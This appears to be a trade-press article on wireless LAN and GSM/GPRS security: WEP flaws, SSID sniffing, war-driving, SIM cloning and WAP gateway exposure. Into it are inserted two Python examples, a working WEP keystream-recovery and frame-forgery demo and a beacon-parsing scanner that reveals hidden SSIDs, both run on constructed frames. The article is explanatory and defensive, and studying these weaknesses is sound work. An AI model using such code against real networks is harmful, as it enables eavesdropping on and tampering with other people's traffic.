Ever since the Institute of Electrical and Electronics Engineers (IEEE) launched the 802.11b wireless standard there have been fears about its security. Broadcasting data packets over a 1,500m radius is different from sending them over cables. Security experts are concerned at the disparity between the amount of wireless network activity in the corporate community and the low level of awareness of the vulnerability of radio local area networks (Lans). The problem with broadcasting corporate data over a relatively wide area is that smart people with the right equipment can intercept the signal, says Geoff Davies, managing director of security consultancy I-Sec.

At the recent Infosec security conference in London, an I-Sec team demonstrated how a wireless 802.11b network could be found and attacked using no more than an empty Pringles tube and a copy of Netstumbler, a free wireless Lan scanning tool. "The tube is the correct length for the radio signal, and there is a bit of metal you can fashion that acts as a 2.4GHz radio antenna, providing a signal boost," says Davies, who argues that a do-it-yourself antenna of this sort will cost you less than the equivalent £85 unit bought on the high street.

So how can such networks be hacked? The biggest problem lies with inadequate security standards and with poorly configured devices, explains Davies. For a start, most of the wireless base stations sold by suppliers ship with the built-in Wired Equivalent Privacy (Wep) encryption turned off. Unless you manually reconfigure your access points, your network will be broadcasting every frame in the clear. This problem is not new in kind; many firewalls also need to be configured before they can be used securely. But a conventional firewall does not broadcast its traffic across a wide area. And even when you do turn on Wep, there are problems inherent in the protocol itself.
The problem lies in Wep's key mechanism. The protocol uses the RC4 stream cipher with a 24-bit initialisation vector prepended to a fixed shared key, and the way the two are combined means that the key can be recovered by passively analysing the data flow across the network over a period of time. Estimates of how long this takes range from 15 minutes to several days, depending on the volume of traffic. A response on the popular geek bulletin board Slashdot from Stuart Kerry, chairman of the IEEE 802.11 working group for wireless Lans, protested that attacks using this vulnerability would take considerable development resources and computing power. That no longer seems to be the case. One open source Wep cracker needs between five million and 10 million packets to be gathered from a wireless network, after which it recovers the key in less than a second, and it is not the only such tool. Meanwhile the IEEE's 802.11i task group is working on a replacement for Wep.

Another problem, says Davies, is that the service set identifier (SSID), a network name of up to 32 bytes carried in clear text in the management frames (beacons, probes and association requests) that access points and clients exchange, can be sniffed by third parties. The SSID is a network identifier: a device that does not know it cannot join. Unfortunately, says Davies, most supplier equipment is configured to broadcast the SSID automatically in its beacons, essentially handing new devices a ticket to join the network. That is useful for public wireless networks in places such as airports and retail outlets (in the US, for example, Starbucks is offering 802.11b access in some of its stores), but it is another loophole for corporates that do not switch it off. Note that suppressing the SSID in beacons is not access control: the name still appears in the clear in probe responses and association requests, so a sniffer learns it as soon as a legitimate client connects.

Finding Lans to crack is not a problem for would-be hackers, thanks to the online community. Other programs that sniff for wireless Lans and report their weaknesses include Kismet and Wellenreiter.
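The two design flaws referred to above, shown in a toy model of Wep. This is an added example and not code from the article or from any of the tools it names: Wep prepends a 24-bit initialisation vector (IV) to the shared key and feeds the result to RC4, sends the IV in the clear and XORs the keystream over the payload plus a CRC-32 integrity check value (ICV). The key, IVs and payloads are constructed for the example. The first function pair shows that one frame with known contents gives an eavesdropper the keystream for its IV, so every later frame reusing that IV can be read without the key; the second shows that the linear ICV lets an attacker alter an encrypted frame so that the receiver still accepts it.

```python
"""Added example, not from the article: a toy Wep showing keystream reuse and
ICV malleability. Key, IVs and payloads below are constructed."""
import zlib


def rc4(key: bytes, length: int) -> bytes:
    """Plain RC4: key scheduling, then `length` bytes of keystream."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(payload: bytes) -> bytes:
    """Wep's integrity check value is a plain CRC-32, little-endian."""
    return zlib.crc32(payload).to_bytes(4, "little")


def wep_encrypt(key: bytes, iv: bytes, payload: bytes) -> bytes:
    """Frame = IV (clear) || RC4(IV||key) xor (payload || ICV)."""
    assert len(iv) == 3
    body = payload + icv(payload)
    return iv + xor(body, rc4(iv + key, len(body)))


def wep_decrypt(key: bytes, frame: bytes) -> bytes:
    """Receiver side: strip the IV, undo RC4, verify the ICV."""
    iv, body = frame[:3], frame[3:]
    plain = xor(body, rc4(iv + key, len(body)))
    payload, check = plain[:-4], plain[-4:]
    if icv(payload) != check:
        raise ValueError("ICV check failed")
    return payload


# Every 802.11 data frame carrying IP starts with this LLC/SNAP header, so the
# first eight payload bytes of any frame are known plaintext to an eavesdropper.
SNAP_IP = bytes.fromhex("aaaa030000000800")


def keystream_from_known_plaintext(frame: bytes, known_payload: bytes) -> bytes:
    """Flaw 1: ciphertext xor known plaintext is the keystream for this IV.
    The 24-bit IV space repeats within hours on a busy network, so any later
    frame reusing the IV is readable without ever learning the key."""
    return xor(frame[3:], known_payload + icv(known_payload))


def read_frame_with_keystream(frame: bytes, keystream: bytes) -> bytes:
    """Decrypt another frame that reused the IV (keystream must be long enough)."""
    return xor(frame[3:-4], keystream)


def flip_bits(frame: bytes, offset: int, delta: bytes) -> bytes:
    """Flaw 2: CRC-32 is linear, crc(P ^ D) == crc(P) ^ crc(D) ^ crc(zeros) for
    equal lengths, and XOR passes straight through a stream cipher. Without the
    key, change chosen payload bytes and patch the encrypted ICV to match."""
    body = bytearray(frame[3:])
    n = len(body) - 4
    d = bytearray(n)
    d[offset:offset + len(delta)] = delta
    icv_delta = zlib.crc32(bytes(d)) ^ zlib.crc32(bytes(n))
    for k in range(n):
        body[k] ^= d[k]
    for k, b in enumerate(icv_delta.to_bytes(4, "little")):
        body[n + k] ^= b
    return frame[:3] + bytes(body)


def demo():
    key = bytes.fromhex("0102030405")   # constructed 40-bit Wep key
    iv = bytes.fromhex("112233")        # an IV the access point reuses
    # Frame 1 is fully known to the attacker (for instance, one they provoked).
    p1 = SNAP_IP + b"GET /index.html HTTP/1.0\r\n\r\n"
    p2 = SNAP_IP + b"user=bob&password=hunter2"
    f1 = wep_encrypt(key, iv, p1)
    f2 = wep_encrypt(key, iv, p2)

    ks = keystream_from_known_plaintext(f1, p1)
    leaked = read_frame_with_keystream(f2, ks)

    start = len(SNAP_IP) + len(b"user=bob&password=")
    forged = flip_bits(f2, start, xor(b"hunter2", b"letmein"))
    return leaked, wep_decrypt(key, forged)
```

`demo()` returns the second frame's payload recovered without the key, and the payload the receiver accepts from the forged frame ("letmein" in place of "hunter2", ICV still valid). The key-recovery attack the article refers to is a separate statistical weakness in how RC4 is keyed from IV||key; it is not shown here.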
"Some of these programs can handle a GPS device plugged into them, so that they can log the co-ordinates," says Davies. "Then using programs such as Multimap, someone can put in the longitude and latitude. They can drive around and produce their own maps. This is how we got put on to wireless problems - someone showed me a copy of a map of Brighton." Such maps are easily available on the Internet; the University of Kansas's vulnerability mapping project, for example, yields a map of wireless Lan vulnerabilities in downtown Kansas.

Running a wireless Lan that broadcasts unprotected data to potential snoopers could land you in trouble with the Information Commissioner if that data includes customer information, warns Rupert Battcock, a solicitor at law firm Nabarro Nathanson. "The Data Protection Act has a requirement that if personal data is being processed, there must be adequate protection in place," says Battcock. "If an organisation is sending data by wireless means, it could be in breach of the seventh data protection principle which covers access to personal data."

Still, wireless Lan technology can be a boon to organisations with many mobile workstations or personal digital assistants. Companies in buildings that are difficult to cable will find it useful, as will those that encourage hotdesking among staff. There are things you can do to take advantage of wireless Lan technology while minimising your risk. Building Radius (remote authentication dial-in user service) authentication into your wireless network is a good idea, but it only authenticates users and still leaves your traffic exposed to sniffers with Wep-cracking tools. The most advisable course is to treat Wep as an insecure mechanism and run something like IPSec on top of it, effectively creating a virtual private network (VPN) for your wireless users, so that the confidentiality of the data no longer depends on the Wep key at all.
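The core of the scanning programs described above, as an added example that is neither the article's code nor that of Netstumbler, Kismet or Wellenreiter: a parser for 802.11 beacon and probe-response frames. These are management frames that access points transmit in the clear, and nothing in 802.11b protects them, so the SSID and the capability bit that says whether Wep is enabled are readable by anyone in radio range. The example also covers the SSID-hiding caveat: an access point that sends a zero-length SSID in its beacons still sends the real name in probe responses. All frames are constructed here rather than captured; the frame-control values and field offsets are those of the 802.11 management frame format.

```python
"""Added example, not from the article: the parsing at the heart of a
war-driving scanner. Frames below are constructed, not captured."""
import struct

TAG_SSID = 0
TAG_RATES = 1
CAP_ESS = 0x0001
CAP_PRIVACY = 0x0010          # set when the access point requires Wep
SUBTYPE_PROBE_RESP = 0x50     # low byte of frame control: management, probe response
SUBTYPE_BEACON = 0x80         # low byte of frame control: management, beacon


def build_frame(subtype: int, bssid: bytes, ssid: bytes, wep: bool,
                hidden: bool = False) -> bytes:
    """Assemble a beacon or probe response the way an access point would
    (used here only to make test input)."""
    header = struct.pack("<HH6s6s6sH", subtype, 0, b"\xff" * 6, bssid, bssid, 0)
    cap = CAP_ESS | (CAP_PRIVACY if wep else 0)
    fixed = struct.pack("<QHH", 0, 100, cap)   # timestamp, beacon interval, capability
    ssid_value = b"" if hidden else ssid       # "hidden" SSID = zero-length SSID element
    ies = bytes([TAG_SSID, len(ssid_value)]) + ssid_value
    ies += bytes([TAG_RATES, 4, 0x82, 0x84, 0x8B, 0x96])   # 1, 2, 5.5, 11 Mbit/s
    return header + fixed + ies


def parse_ies(data: bytes) -> dict:
    """Walk the tag/length/value elements that follow the fixed fields."""
    ies, i = {}, 0
    while i + 2 <= len(data):
        tag, length = data[i], data[i + 1]
        ies[tag] = data[i + 2:i + 2 + length]
        i += 2 + length
    return ies


def parse_frame(frame: bytes) -> dict:
    """Extract BSSID, SSID and the Privacy (Wep) bit from a management frame."""
    fc, = struct.unpack_from("<H", frame, 0)
    if (fc & 0x00FC) not in (SUBTYPE_BEACON, SUBTYPE_PROBE_RESP):
        raise ValueError("not a beacon or probe response")
    bssid = frame[16:22]                        # address 3 of the 24-byte header
    cap, = struct.unpack_from("<H", frame, 34)  # after 8-byte timestamp, 2-byte interval
    ssid = parse_ies(frame[36:]).get(TAG_SSID, b"")
    return {
        "bssid": bssid.hex(":"),
        "ssid": ssid.decode("utf-8", "replace") if ssid else None,
        "hidden": not ssid,
        "wep": bool(cap & CAP_PRIVACY),
    }


def survey(frames) -> list:
    """One row per BSSID, as a Netstumbler-style tool reports it. A hidden
    SSID is filled in as soon as a probe response for the same BSSID is seen.
    A real tool would add the GPS fix for each sighting."""
    seen = {}
    for frame in frames:
        try:
            info = parse_frame(frame)
        except ValueError:
            continue          # data frames and other management frames are ignored
        row = seen.setdefault(info["bssid"], info)
        if row["hidden"] and not info["hidden"]:
            row["ssid"], row["hidden"] = info["ssid"], False
        row["wep"] = info["wep"]
    return sorted(seen.values(), key=lambda r: r["bssid"])


def open_networks(frames) -> list:
    """BSSIDs seen without the Privacy bit, i.e. not even Wep is switched on."""
    return [r["bssid"] for r in survey(frames) if not r["wep"]]
```

Feed `survey()` the management frames captured by a card in monitor mode and it produces the list a scanner shows: name, BSSID and whether Wep is on. The `hidden` flag illustrates the point that turning off SSID broadcast hides nothing from a patient sniffer.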
A VPN will increase the cost of your network, but you can decide whether to implement one using the same process you should apply to every other part of your infrastructure. Map the risks described here against the business data you will be passing over radio, and assess the financial impact of a breach. If the data is too sensitive, reassess what should be passed over the wireless network, or use a VPN to raise your protection.

Companies worrying about the security of their wireless Lans should also consider the dangers of sending sensitive information over cellular links. The risk of interception on GSM is relatively low, although not zero, but things get considerably riskier on GPRS networks, say pundits. Even so, GSM links, over which many Wireless Application Protocol (Wap) data sessions are still carried, are bad enough.

Things improved considerably when the world moved from first-generation analogue cellular links to second-generation digital connections using GSM, at which point voice calls became digitally encrypted over the air. However, persistent (and rich) attackers can still listen to your staff's or customers' conversations thanks to flaws in cellular network security. Gunter Ollmann, manager of X-Force security assessment services at security consultancy Internet Security Systems, says it is possible to impersonate the network with a fake base station, because a GSM phone authenticates itself to the network but never authenticates the network to itself. The cost of a genuine base station (if a cellular supplier will sell you one) or of building a fake one is considerable, however.

Another potential flaw in GSM lies mainly with Sim (Subscriber Identity Module) card manufacturers. Sim cards are portable smartcards used within GSM phones to identify a subscriber to the network. Each holds a secret key, and the Comp128 algorithm uses that key to answer the network's authentication challenge and to derive the session key that encrypts the call.
Comp128 was broken in 1998 and operators should have stopped using it, but they have not, says Ollie Whitehouse, managing security architect at security consultancy @Stake, primarily because Comp128 is so well known and cheap to burn on to Sim cards. It is possible to clone such cards using kits the unscrupulous can buy for less than £100: the attack recovers the secret key by sending the card a large number of chosen challenges and analysing its responses. GSM service providers watch for concurrent calls using the same Sim identity, which makes card cloning risky, and a newer version of the algorithm (Comp128-2) has been produced that makes the key much harder to extract.

Over-the-air decryption is much more difficult because of the ciphers used to scramble these signals. A team at the University of California, Berkeley claims to have done it theoretically, but has not demonstrated it in practice. An online search for passive briefcase-sized GSM monitoring and decryption systems will reveal a couple for sale on the international market. Again, the investment required is considerable, says Alex Blomberg, head of Tandor, a firm specialising in cellular security systems, who says they are mainly used by government organisations. The bottom line is that an attacker would need to be after very sensitive data to make GSM monitoring or decryption kit worth the investment. Sim cloning is a more real danger.

But, says Whitehouse, the first-generation Wap standard used for mobile data applications represents another risk. Wap uses the Wireless Transport Layer Security (WTLS) protocol to secure data links, but there is a flaw in version 1.0 of the standard. Between the phone and the cellular service provider's network it uses a datagram transport, the User Datagram Protocol (UDP) over IP bearers, because that copes with narrow bandwidth and unreliable connections better than TCP. On the provider's internal network the conventional TCP/IP stack with SSL is used.
Because of the translation needed between the two protocol stacks, the data has to be decrypted at some point, and this happens on a Wap gateway operated by the cellular provider: WTLS is stripped off on the gateway and the data is re-encrypted with SSL before being forwarded to the content provider. For a moment the data sits in clear text on a machine that neither the user nor the content provider controls, and this lack of end-to-end encryption makes it vulnerable. One answer is to run a further layer of encryption on top of the Wap security protocol, using keys processed by the phone, but most phones cannot perform the public-key operations required in a time acceptable to the user. Fortunately, with the recently approved Wap 2.0, IP is used all the way through the session, which makes end-to-end encryption possible, says Whitehouse. This makes Wap viable from a security standpoint, especially over relatively hard-to-crack GSM links.

Unfortunately, just as the application layer becomes more secure, the transport layer appears to be becoming more vulnerable. For data sessions, many people will be moving from GSM to GPRS, a 2.5G transport. Although Wap 2.0 with its improved security specification runs perfectly well over GPRS, Whitehouse says some implementations of the GPRS specification are less secure than GSM. "@Stake has already broken into GPRS networks from the end of the phone," he says. "GSM was a closed system using band-managed infrastructure. In GPRS you can draw a dotted line from the handset to the sensitive parts of the network." The problem is that while GSM runs as an encrypted, circuit-switched system, the packet-based nature of GPRS makes it look like an IP network all the way from the phone into the operator's network, and beyond to the content provider's back-end systems. "The attack platform is the laptop and the GPRS modem," says Whitehouse. "You can use a full suite of penetration tools just as you would on a wireless Lan."
Content providers should not rule out GPRS-based services, which are likely to be a lucrative source of revenue over the next five years as the market matures. But it would be worth getting a demonstrable guarantee that a provider's GPRS network, and particularly the link between its network and yours, has been secured using standard network protection techniques, above all filtering between the handset address space and the provider's infrastructure, and between the provider and your own systems. Running a penetration test against your own network through the provider's GPRS infrastructure, from a handset or GPRS modem, would be an astute move.
Local and wide area radio networks offer convenience, but at a cost: security issues are a key concern for operators. Danny Bradbury explores the problem areas and finds out what can be done to minimise the risks.